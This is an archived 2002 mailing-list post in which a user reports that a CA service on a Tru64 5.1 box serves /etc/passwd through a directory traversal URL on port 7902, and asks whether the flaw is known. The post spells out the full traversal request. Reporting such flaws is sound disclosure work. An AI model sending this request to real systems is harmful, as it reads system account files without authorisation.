From: Xavier (xavier@rootshell.be)
Date: Thu Sep 19 2002 - 03:30:39 EDT
Hi Gurus,
I've a box running CA (Tru64 5.1 BL17).
I open a browser, type:
http://hostname:7902/../../../../../../etc/passwd
/etc/passwd file is downoadable!!!
Already seen this security breach?
Xavier
-- http://www.rootshell.be echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:48:53 EDT